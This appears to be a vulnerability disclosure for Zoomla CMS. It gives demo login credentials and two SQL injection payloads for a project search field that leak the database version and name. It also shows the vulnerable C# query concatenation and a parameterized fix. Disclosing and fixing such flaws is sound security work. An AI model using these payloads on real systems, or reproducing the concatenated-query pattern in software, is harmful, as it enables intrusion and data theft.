### Brief description:
SQL injection in the latest version of Zoomla CMS (逐浪CMS)
### Details:
Visit
```
http://demo.zoomla.cn/User/login.aspx
```
```
test123
```
```
111111
```
Log in.
Then visit
```
http://demo.zoomla.cn/User/PrintServer/Project/ProjectList.aspx
```
In the keyword field, enter
```
1' and (select @@version)>0--
```
[![73.png](https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png)](https://images.seebug.org/upload/201408/0521321744074cc59757380f283e02146d746c35.png)
Click Search.
[![74.png](https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png)](https://images.seebug.org/upload/201408/05213309339e9a83e45b41f6889c201cadc6a267.png)
Enter
```
1' and (select db_name())>0--
```
[![75.png](https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png)](https://images.seebug.org/upload/201408/05213411080a3ea6df28ca62f8d5a1c714dbe36e.png)
The main code is as follows:
```
protected void Search_Click(object sender, EventArgs e)
{
    string keyWord = this.SearchValue.Text.Trim(); // not sanitized
    int type = DataConverter.CLng(this.DLType.SelectedValue);
    DataView defaultView = this.bll.ProjectSearch(type, keyWord).DefaultView; // follow this call
    this.Egv.DataSource = defaultView;
    this.Egv.DataKeyNames = new string[] { "ProjectID" };
    this.Egv.DataBind();
}
```
```
public DataTable ProjectSearch(int Type, string KeyWord)
{
    string str = string.Empty;
    switch (Type)
    {
        case 0:
            str = "ProjectName like '%" + KeyWord + "%'";
            break;
        case 1:
            str = "StartDate like '%" + KeyWord.Trim() + "%'";
            break;
        case 2:
            str = "ProjectID=" + KeyWord;
            break;
        case 3:
            str = "ProjectIntro like '%" + KeyWord + "%'";
            break;
        case 4:
            str = " UserID in (select UserID from ZL_User where UserName like '%" + KeyWord + "%')";
            break;
        default:
            str = "ProjectName like '%" + KeyWord + "%'";
            break;
    }
    // The WHERE clause is built by string concatenation and executed with no parameters (null)
    string cmdText = "select * from [ZL_Project] where " + str;
    return SqlHelper.ExecuteTable(CommandType.Text, cmdText, null);
}
// keyWord is injectable
```
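A parameterized form of the `ProjectSearch` method shown above, as an added example that is not Zoomla's own code: every query text is a constant and the keyword is bound as a parameter, so input such as `1' and (select @@version)>0--` is only ever compared as data. It uses plain ADO.NET rather than the page's `SqlHelper`; the class name, the `connectionString` parameter and the assumed column types are hypothetical.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;

public static class ProjectSearchHardened
{
    // The SQL text is built only from constants; the keyword travels as a parameter value.
    public static SqlCommand BuildSearchCommand(int type, string keyWord)
    {
        keyWord = (keyWord ?? string.Empty).Trim();
        var cmd = new SqlCommand();
        string where;
        switch (type)
        {
            case 1: where = "StartDate like @kw"; break;
            case 2:
                // ProjectID is compared as a number, so accept nothing but an integer.
                int id;
                if (!int.TryParse(keyWord, out id))
                    throw new ArgumentException("ProjectID must be an integer", "keyWord");
                cmd.CommandText = "select * from [ZL_Project] where ProjectID = @id";
                cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
                return cmd;
            case 3: where = "ProjectIntro like @kw"; break;
            case 4: where = "UserID in (select UserID from ZL_User where UserName like @kw)"; break;
            default: where = "ProjectName like @kw"; break; // also covers type 0
        }
        cmd.CommandText = "select * from [ZL_Project] where " + where;
        // Assumption: the searched columns are (n)varchar; 4000 is the nvarchar(n) maximum.
        cmd.Parameters.Add("@kw", SqlDbType.NVarChar, 4000).Value = "%" + keyWord + "%";
        return cmd;
    }

    // connectionString is a hypothetical parameter; the page's SqlHelper hides the real one.
    public static DataTable ProjectSearch(string connectionString, int type, string keyWord)
    {
        using (var conn = new SqlConnection(connectionString))
        using (var cmd = BuildSearchCommand(type, keyWord))
        using (var adapter = new SqlDataAdapter(cmd))
        {
            cmd.Connection = conn;
            var table = new DataTable();
            adapter.Fill(table); // Fill opens and closes the connection itself
            return table;
        }
    }
}
```

With type 2 the keyword from the page fails `int.TryParse` and is rejected before any query runs; with every other type it reaches the server only as the value of `@kw`.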
### Proof of vulnerability:
See the proof above.